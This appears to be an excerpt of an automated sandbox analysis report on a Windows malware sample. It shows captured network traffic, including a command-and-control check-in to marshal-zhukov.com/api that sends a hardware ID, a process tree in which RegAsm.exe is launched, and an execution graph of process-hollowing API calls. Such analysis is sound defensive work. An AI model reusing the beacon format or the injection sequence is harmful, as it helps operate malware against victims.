                                                                                        2024-11-14 07:08:32 UTC15331OUTData Raw: 32 a6 f0 0e 20 ec 0f a4 58 fb 01 7a 30 ee 7f 95 76 92 d4 89 22 cf 20 65 15 46 e7 1b e9 2b 01 ad 90 ac 9b 84 1e 5b 67 79 4b 1c 69 88 a6 67 db b4 8d 02 68 8c 18 dd 3a a7 35 3c 5a ef dc c4 48 a7 a4 62 87 6c 74 f2 16 92 c6 c5 6f f1 49 22 76 21 a5 ec 9c 06 a9 1d 42 f3 e2 02 be 16 57 43 af c4 50 2d aa f4 36 d4 93 46 39 f2 fd 2d 1f f1 41 98 67 be 4f 9f 26 81 ba f7 80 56 fb 46 e5 cc 0f 92 dd 11 d3 a9 cd af c1 43 15 3f 48 3a 22 ae 57 20 85 3b 16 75 a3 79 f3 7c d6 b1 26 33 a0 6b e6 cb 20 03 05 ae b4 28 0e d0 5e f3 bc 4f 9f a3 b9 80 18 7f 5e ef 5f e9 c0 6e 92 fd 53 8d 5c 8d f0 be 6b 06 63 75 9d 84 42 5b 72 1b 17 2d c7 bf b2 49 60 3d 92 b8 de 7b c3 c3 05 f3 d7 15 ee e7 3d 52 30 05 8e ae 02 a8 7c f9 b0 d0 78 38 09 25 3a 0b 8d 09 2f 3e df 42 38 0b c9 ce 2c d7 00 1b a4
                                                                                        Data Ascii: 2 Xz0v" eF+[gyKigh:5<ZHbltoI"v!BWCP-6F9-AgO&VFC?H:"W ;uy|&3k (^O^_nS\kcuB[r-I`={=R0|x8%:/>B8,
                                                                                        2024-11-14 07:08:32 UTC15331OUTData Raw: 45 54 85 db 8b 50 9e 24 6f 33 70 82 ac 00 19 b6 6e b4 16 e5 ef dd 0b 5b 54 ad f5 ac cb 5b 3f 98 79 1b c6 7b c6 58 49 ec 59 4f d1 c8 a1 99 2e 29 5f 40 39 9b 07 ca 20 7e 9e 92 1d a2 09 03 f7 9d f9 44 14 5c 51 8c e9 7b 60 97 28 de ff ef 2b d4 55 a9 9e 5a da 87 40 e1 b9 e3 36 74 5a 07 49 05 05 b2 54 2f 50 61 38 1c b5 03 2c a0 d6 76 b1 72 69 54 14 8c 8a 47 d1 f0 30 61 10 ae c0 d8 9b 09 62 df 51 01 b1 c5 1d 00 d8 73 39 88 7f 1b 26 18 43 ea 5b 6d df 47 4e 3a e0 de 5e ab d2 df 1d af 9e 23 dc 72 00 8f 3d 47 71 80 28 5e 3f eb b3 ff 16 7c 20 3c 34 b0 83 05 8c 72 c7 b8 e3 84 cf 61 8b 8a 3a 7e ce d7 d5 82 62 d2 ee 68 68 4d 61 f5 ad 11 c2 03 81 60 63 20 54 97 78 6a 58 63 d5 9a 55 25 27 1d 84 86 92 c8 8d 31 08 2e 52 0c f5 1e b9 fd c9 31 7c 5f 12 1c be fa 57 89 65 5d 71
                                                                                        Data Ascii: ETP$o3pn[T[?y{XIYO.)_@9 ~D\Q{`(+UZ@6tZIT/Pa8,vriTG0abQs9&C[mGN:^#r=Gq(^?| <4ra:~bhhMa`c TxjXcU%'1.R1|_We]q
                                                                                        2024-11-14 07:08:35 UTC1017INHTTP/1.1 200 OK
                                                                                        Date: Thu, 14 Nov 2024 07:08:35 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=j7knarksick4ui3fataikeo2nj; expires=Mon, 10-Mar-2025 00:55:13 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VRqU4qFuIB4EJIxgvgyp0PNcF4x2BmUEaHTvQRuOFeEegnhJ0P%2BRttNDu3hvoRFV4g7Eq33Ox2Wmj4WBkWUDbuKJeld2Mki4cQYZhYvhXXQRBfQVocSfiOeXaNvG0Jf2HR9K6YA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e252bc26d042e18-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1050&sent=222&recv=627&lost=0&retrans=0&sent_bytes=2848&recv_bytes=588692&delivery_rate=2623188&cwnd=229&unsent_bytes=0&cid=cbbaaa55c39e399c&ts=2434&x=0"


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.549715188.114.96.34436484C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-14 07:08:36 UTC266OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 87
                                                                                        Host: marshal-zhukov.com
                                                                                        2024-11-14 07:08:36 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 26 6a 3d 26 68 77 69 64 3d 42 44 42 31 45 46 39 39 32 42 31 45 34 33 38 46 43 45 43 35 45 37 39 45 33 34 45 30 34 37 41 39
                                                                                        Data Ascii: act=get_message&ver=4.0&lid=yau6Na--6928154717&j=&hwid=BDB1EF992B1E438FCEC5E79E34E047A9
                                                                                        2024-11-14 07:08:36 UTC1019INHTTP/1.1 200 OK
                                                                                        Date: Thu, 14 Nov 2024 07:08:36 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=lmjlvp3gmvdt2g16qjs0eudiso; expires=Mon, 10-Mar-2025 00:55:15 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tvw%2FGBSTQUMlcAJxfdG6SNAY6x46a%2FumK7T7CIcVXC6jnQetgLkhdI97mbtm4%2BCKdbMUN%2Bi%2F78ZjM6T5qS9FzJOTc6za%2BilLtAngTa4j0vkoYrLv55F0UaClojuHunrRkCh7NMg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e252bd57a9c6bb9-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1053&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=989&delivery_rate=2686456&cwnd=251&unsent_bytes=0&cid=6da4e7d39aa22fb4&ts=491&x=0"
                                                                                        2024-11-14 07:08:36 UTC54INData Raw: 33 30 0d 0a 43 58 76 39 57 55 30 43 50 55 51 43 4f 67 79 37 5a 37 66 59 62 38 72 63 4e 72 4a 72 31 39 79 44 67 56 6f 35 30 6f 54 79 76 44 31 53 4a 67 3d 3d 0d 0a
                                                                                        Data Ascii: 30CXv9WU0CPUQCOgy7Z7fYb8rcNrJr19yDgVo50oTyvD1SJg==
                                                                                        2024-11-14 07:08:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:02:08:16
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Users\user\Desktop\nlJ2sNaZVi.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\nlJ2sNaZVi.exe"
                                                                                        Imagebase:0xb80000
                                                                                        File size:45'056 bytes
                                                                                        MD5 hash:5E443F31B2CF8B956AFEC50AD5C0F839
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:02:08:19
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline"
                                                                                        Imagebase:0x480000
                                                                                        File size:2'141'552 bytes
                                                                                        MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:02:08:19
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:02:08:19
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEB5.tmp" "c:\Users\user\AppData\Local\Temp\v0t1l0co\CSC65BF410C392B47AC8396E849E0F657FD.TMP"
                                                                                        Imagebase:0x300000
                                                                                        File size:46'832 bytes
                                                                                        MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:02:08:19
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                                                        Imagebase:0x610000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:22.9%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:114
                                                                                          Total number of Limit Nodes:3
                                                                                          execution_graph 2049 2d72bf2 2051 2d72bc6 2049->2051 2050 2d72bce 2050->2050 2051->2050 2067 2d7280c CreateProcessA 2051->2067 2068 2d72818 CreateProcessA 2051->2068 2052 2d72c7d 2060 2d72ee7 2052->2060 2079 2d723f0 2052->2079 2083 2d723f8 2052->2083 2053 2d72ce7 2053->2060 2087 2d72679 2053->2087 2091 2d72680 2053->2091 2054 2d72d2c 2054->2060 2095 2d724c9 2054->2095 2099 2d724d0 2054->2099 2055 2d72d8f 2055->2060 2103 2d72590 2055->2103 2107 2d72588 2055->2107 2056 2d72e5f 2073 2d72590 WriteProcessMemory 2056->2073 2074 2d72588 WriteProcessMemory 2056->2074 2057 2d72db6 2057->2056 2057->2060 2069 2d72590 WriteProcessMemory 2057->2069 2070 2d72588 WriteProcessMemory 2057->2070 2058 2d72e88 2058->2060 2065 2d723f0 Wow64SetThreadContext 2058->2065 2066 2d723f8 Wow64SetThreadContext 2058->2066 2059 2d72ed2 2059->2060 2111 2d72348 2059->2111 2115 2d72340 2059->2115 2065->2059 2066->2059 2067->2052 2068->2052 2069->2057 2070->2057 2073->2058 2074->2058 2080 2d7243d Wow64SetThreadContext 2079->2080 2082 2d72485 2080->2082 2082->2053 2084 2d7243d Wow64SetThreadContext 2083->2084 2086 2d72485 2084->2086 2086->2053 2088 2d726cb ReadProcessMemory 2087->2088 2090 2d7270f 2088->2090 2090->2054 2092 2d726cb ReadProcessMemory 2091->2092 2094 2d7270f 2092->2094 2094->2054 2096 2d724d0 VirtualAllocEx 2095->2096 2098 2d7254d 2096->2098 2098->2055 2100 2d72510 VirtualAllocEx 2099->2100 2102 2d7254d 2100->2102 2102->2055 2104 2d725d8 WriteProcessMemory 2103->2104 2106 2d7262f 2104->2106 2106->2057 2108 2d725d8 WriteProcessMemory 2107->2108 2110 2d7262f 2108->2110 2110->2057 2112 2d72388 ResumeThread 2111->2112 2114 2d723b9 2112->2114 2114->2060 2116 2d72388 ResumeThread 2115->2116 2118 2d723b9 2116->2118 2118->2060 2179 2d72b91 2181 2d72bc6 2179->2181 2180 2d72bce 2180->2180 2181->2180 2197 2d7280c CreateProcessA 2181->2197 2198 2d72818 CreateProcessA 2181->2198 2182 2d72c7d 2190 2d72ee7 2182->2190 2207 2d723f0 Wow64SetThreadContext 2182->2207 2208 2d723f8 Wow64SetThreadContext 2182->2208 2183 2d72ce7 2183->2190 2191 2d72680 ReadProcessMemory 2183->2191 2192 2d72679 ReadProcessMemory 2183->2192 2184 2d72d2c 2184->2190 2205 2d724d0 VirtualAllocEx 2184->2205 2206 2d724c9 VirtualAllocEx 2184->2206 2185 2d72d8f 2185->2190 2193 2d72590 WriteProcessMemory 2185->2193 2194 2d72588 WriteProcessMemory 2185->2194 2186 2d72e5f 2203 2d72590 WriteProcessMemory 2186->2203 2204 2d72588 WriteProcessMemory 2186->2204 2187 2d72db6 2187->2186 2187->2190 2199 2d72590 WriteProcessMemory 2187->2199 2200 2d72588 WriteProcessMemory 2187->2200 2188 2d72e88 2188->2190 2195 2d723f0 Wow64SetThreadContext 2188->2195 2196 2d723f8 Wow64SetThreadContext 2188->2196 2189 2d72ed2 2189->2190 2201 2d72340 ResumeThread 2189->2201 2202 2d72348 ResumeThread 2189->2202 2191->2184 2192->2184 2193->2187 2194->2187 2195->2189 2196->2189 2197->2182 2198->2182 2199->2187 2200->2187 2201->2190 2202->2190 2203->2188 2204->2188 2205->2185 2206->2185 2207->2183 2208->2183 2011 2d72bf9 2013 2d72bc6 2011->2013 2012 2d72bce 2012->2012 2013->2012 2041 2d7280c 2013->2041 2045 2d72818 2013->2045 2014 2d72c7d 2022 2d72ee7 2014->2022 2039 2d723f0 Wow64SetThreadContext 2014->2039 2040 2d723f8 Wow64SetThreadContext 2014->2040 2015 2d72ce7 2015->2022 2023 2d72680 ReadProcessMemory 2015->2023 2024 2d72679 ReadProcessMemory 2015->2024 2016 2d72d2c 2016->2022 2037 2d724d0 VirtualAllocEx 2016->2037 2038 2d724c9 VirtualAllocEx 2016->2038 2017 2d72d8f 2017->2022 2025 2d72590 WriteProcessMemory 2017->2025 2026 2d72588 WriteProcessMemory 2017->2026 2018 2d72e5f 2035 2d72590 WriteProcessMemory 2018->2035 2036 2d72588 WriteProcessMemory 2018->2036 2019 2d72db6 2019->2018 2019->2022 2031 2d72590 WriteProcessMemory 2019->2031 2032 2d72588 WriteProcessMemory 2019->2032 2020 2d72e88 2020->2022 2027 2d723f0 Wow64SetThreadContext 2020->2027 2028 2d723f8 Wow64SetThreadContext 2020->2028 2021 2d72ed2 2021->2022 2033 2d72340 ResumeThread 2021->2033 2034 2d72348 ResumeThread 2021->2034 2023->2016 2024->2016 2025->2019 2026->2019 2027->2021 2028->2021 2031->2019 2032->2019 2033->2022 2034->2022 2035->2020 2036->2020 2037->2017 2038->2017 2039->2015 2040->2015 2042 2d72818 CreateProcessA 2041->2042 2044 2d72a63 2042->2044 2046 2d728a1 CreateProcessA 2045->2046 2048 2d72a63 2046->2048

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 2d7280c-2d728ad 3 2d728e6-2d72906 0->3 4 2d728af-2d728b9 0->4 11 2d7293f-2d7296e 3->11 12 2d72908-2d72912 3->12 4->3 5 2d728bb-2d728bd 4->5 7 2d728e0-2d728e3 5->7 8 2d728bf-2d728c9 5->8 7->3 9 2d728cd-2d728dc 8->9 10 2d728cb 8->10 9->9 13 2d728de 9->13 10->9 18 2d729a7-2d72a61 CreateProcessA 11->18 19 2d72970-2d7297a 11->19 12->11 14 2d72914-2d72916 12->14 13->7 16 2d72939-2d7293c 14->16 17 2d72918-2d72922 14->17 16->11 20 2d72926-2d72935 17->20 21 2d72924 17->21 32 2d72a63-2d72a69 18->32 33 2d72a6a-2d72af0 18->33 19->18 22 2d7297c-2d7297e 19->22 20->20 23 2d72937 20->23 21->20 24 2d729a1-2d729a4 22->24 25 2d72980-2d7298a 22->25 23->16 24->18 27 2d7298e-2d7299d 25->27 28 2d7298c 25->28 27->27 29 2d7299f 27->29 28->27 29->24 32->33 43 2d72af2-2d72af6 33->43 44 2d72b00-2d72b04 33->44 43->44 45 2d72af8-2d72afb call 2d70b04 43->45 46 2d72b06-2d72b0a 44->46 47 2d72b14-2d72b18 44->47 45->44 46->47 49 2d72b0c-2d72b0f call 2d70b04 46->49 50 2d72b1a-2d72b1e 47->50 51 2d72b28-2d72b2c 47->51 49->47 50->51 55 2d72b20-2d72b23 call 2d70b04 50->55 52 2d72b3e-2d72b45 51->52 53 2d72b2e-2d72b34 51->53 57 2d72b47-2d72b56 52->57 58 2d72b5c 52->58 53->52 55->51 57->58 60 2d72b5d 58->60 60->60
                                                                                          APIs
                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 02D72A4E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: bdd0fe2894f45c359f2c57c17d937a9cd79668ecee18ba9cc0980f8bf7eb807e
                                                                                          • Instruction ID: 3e0b3a03e5b078a47aece8240b2edb3c488ed513cf9ebd138ff063684a6974fb
                                                                                          • Opcode Fuzzy Hash: bdd0fe2894f45c359f2c57c17d937a9cd79668ecee18ba9cc0980f8bf7eb807e
                                                                                          • Instruction Fuzzy Hash: 43A15971D00259CFEB24CF68C8457AEBBB2BF48314F1481AAD819A7344EB799985CF91

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 61 2d72818-2d728ad 63 2d728e6-2d72906 61->63 64 2d728af-2d728b9 61->64 71 2d7293f-2d7296e 63->71 72 2d72908-2d72912 63->72 64->63 65 2d728bb-2d728bd 64->65 67 2d728e0-2d728e3 65->67 68 2d728bf-2d728c9 65->68 67->63 69 2d728cd-2d728dc 68->69 70 2d728cb 68->70 69->69 73 2d728de 69->73 70->69 78 2d729a7-2d72a61 CreateProcessA 71->78 79 2d72970-2d7297a 71->79 72->71 74 2d72914-2d72916 72->74 73->67 76 2d72939-2d7293c 74->76 77 2d72918-2d72922 74->77 76->71 80 2d72926-2d72935 77->80 81 2d72924 77->81 92 2d72a63-2d72a69 78->92 93 2d72a6a-2d72af0 78->93 79->78 82 2d7297c-2d7297e 79->82 80->80 83 2d72937 80->83 81->80 84 2d729a1-2d729a4 82->84 85 2d72980-2d7298a 82->85 83->76 84->78 87 2d7298e-2d7299d 85->87 88 2d7298c 85->88 87->87 89 2d7299f 87->89 88->87 89->84 92->93 103 2d72af2-2d72af6 93->103 104 2d72b00-2d72b04 93->104 103->104 105 2d72af8-2d72afb call 2d70b04 103->105 106 2d72b06-2d72b0a 104->106 107 2d72b14-2d72b18 104->107 105->104 106->107 109 2d72b0c-2d72b0f call 2d70b04 106->109 110 2d72b1a-2d72b1e 107->110 111 2d72b28-2d72b2c 107->111 109->107 110->111 115 2d72b20-2d72b23 call 2d70b04 110->115 112 2d72b3e-2d72b45 111->112 113 2d72b2e-2d72b34 111->113 117 2d72b47-2d72b56 112->117 118 2d72b5c 112->118 113->112 115->111 117->118 120 2d72b5d 118->120 120->120
                                                                                          APIs
                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 02D72A4E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: 025ac7e9fd0876cffbf02b59b9dff091b2955c643df67201d69c3f712b8968d1
                                                                                          • Instruction ID: 674d42b727a9ac4c65c58c350d8769f269074ad52414acc1556ef5fbedac38aa
                                                                                          • Opcode Fuzzy Hash: 025ac7e9fd0876cffbf02b59b9dff091b2955c643df67201d69c3f712b8968d1
                                                                                          • Instruction Fuzzy Hash: 31915A71D00259CFEB24CF68C8457EEBBB2BF48314F1481AAD819A7344EB789985CF91

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 121 2d72588-2d725de 123 2d725e0-2d725ec 121->123 124 2d725ee-2d7262d WriteProcessMemory 121->124 123->124 126 2d72636-2d72666 124->126 127 2d7262f-2d72635 124->127 127->126
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02D72620
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 5069f3570bfab7fdeea7770344d286285515e100d93db129b737b65d99330db4
                                                                                          • Instruction ID: 0c89d2a041f3f1d9c484fb5651369f49be685ab1568c1a872f24a2654dca182f
                                                                                          • Opcode Fuzzy Hash: 5069f3570bfab7fdeea7770344d286285515e100d93db129b737b65d99330db4
                                                                                          • Instruction Fuzzy Hash: B72117719003499FCB10CFA9C885BEEBBF5FF48310F10842AE959A7241D7789945CBA4

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 131 2d72590-2d725de 133 2d725e0-2d725ec 131->133 134 2d725ee-2d7262d WriteProcessMemory 131->134 133->134 136 2d72636-2d72666 134->136 137 2d7262f-2d72635 134->137 137->136
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02D72620
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 8ec95e32683f4dd6d627b82a9ff4813a7c7598e9c072872947d651f683f9981a
                                                                                          • Instruction ID: 465a9fe54a79817866ae81011d1e922ec91d4fd4e10b01e01f8ae707077ecdac
                                                                                          • Opcode Fuzzy Hash: 8ec95e32683f4dd6d627b82a9ff4813a7c7598e9c072872947d651f683f9981a
                                                                                          • Instruction Fuzzy Hash: 9A21F4B59003499FCB10DFAAC885BEEBBF5FF48314F10842AE959A7240D7789944CBA4

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 141 2d723f0-2d72443 143 2d72445-2d72451 141->143 144 2d72453-2d72483 Wow64SetThreadContext 141->144 143->144 146 2d72485-2d7248b 144->146 147 2d7248c-2d724bc 144->147 146->147
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02D72476
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 701be48d1d43efde76e92769bf6e3d3744a08cbacc9c388486702856d5afd64d
                                                                                          • Instruction ID: adf6c62da0dd9cd1ccfbd75edd8b72459b4163cc334586b767e6a2b93fff4d7d
                                                                                          • Opcode Fuzzy Hash: 701be48d1d43efde76e92769bf6e3d3744a08cbacc9c388486702856d5afd64d
                                                                                          • Instruction Fuzzy Hash: 422114B19002498FDB14DFAAC4857EEBBF4AF98314F10842AD459A7241DB789985CFA0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 151 2d72679-2d7270d ReadProcessMemory 154 2d72716-2d72746 151->154 155 2d7270f-2d72715 151->155 155->154
                                                                                          APIs
                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 02D72700
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead
                                                                                          • String ID:
                                                                                          • API String ID: 1726664587-0
                                                                                          • Opcode ID: 0ddcc5c3e3908f1fbd5e5186772be9eec39bf8d3f138284e9776c94cf62d52d2
                                                                                          • Instruction ID: 45a1498055397b83222c3964ea6d298dc63242be69a0b504803fc37dd03ff51a
                                                                                          • Opcode Fuzzy Hash: 0ddcc5c3e3908f1fbd5e5186772be9eec39bf8d3f138284e9776c94cf62d52d2
                                                                                          • Instruction Fuzzy Hash: DE2119B1D003499FCB14DFA9C985AEEBBF5FF88310F50842AE919A7250C7389945CBA0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 169 2d72680-2d7270d ReadProcessMemory 172 2d72716-2d72746 169->172 173 2d7270f-2d72715 169->173 173->172
                                                                                          APIs
                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 02D72700
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead
                                                                                          • String ID:
                                                                                          • API String ID: 1726664587-0
                                                                                          • Opcode ID: 586d154cdcca0c9f45d2d4a82551137c67f4340d0b6f27407aaae2bdc253fbbd
                                                                                          • Instruction ID: 9f0179a4ea90a6574c1162f516dfc0a63f2f8ca9f7fb5fc3d04c54e93f6ae71e
                                                                                          • Opcode Fuzzy Hash: 586d154cdcca0c9f45d2d4a82551137c67f4340d0b6f27407aaae2bdc253fbbd
                                                                                          • Instruction Fuzzy Hash: FC2138B1D003499FCB10DFAAC985AEEFBF5FF48310F50842AE919A7240D7389944CBA0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 159 2d723f8-2d72443 161 2d72445-2d72451 159->161 162 2d72453-2d72483 Wow64SetThreadContext 159->162 161->162 164 2d72485-2d7248b 162->164 165 2d7248c-2d724bc 162->165 164->165
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02D72476
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: d0a6a5b0860db3e6f5bae38f766e8d85ac974868d17b1abeb7dd22909223fae8
                                                                                          • Instruction ID: 64ae528febbaa7ef71cff89eeb26ce44fc66ee6f038aa716cc873b47ca7ca5de
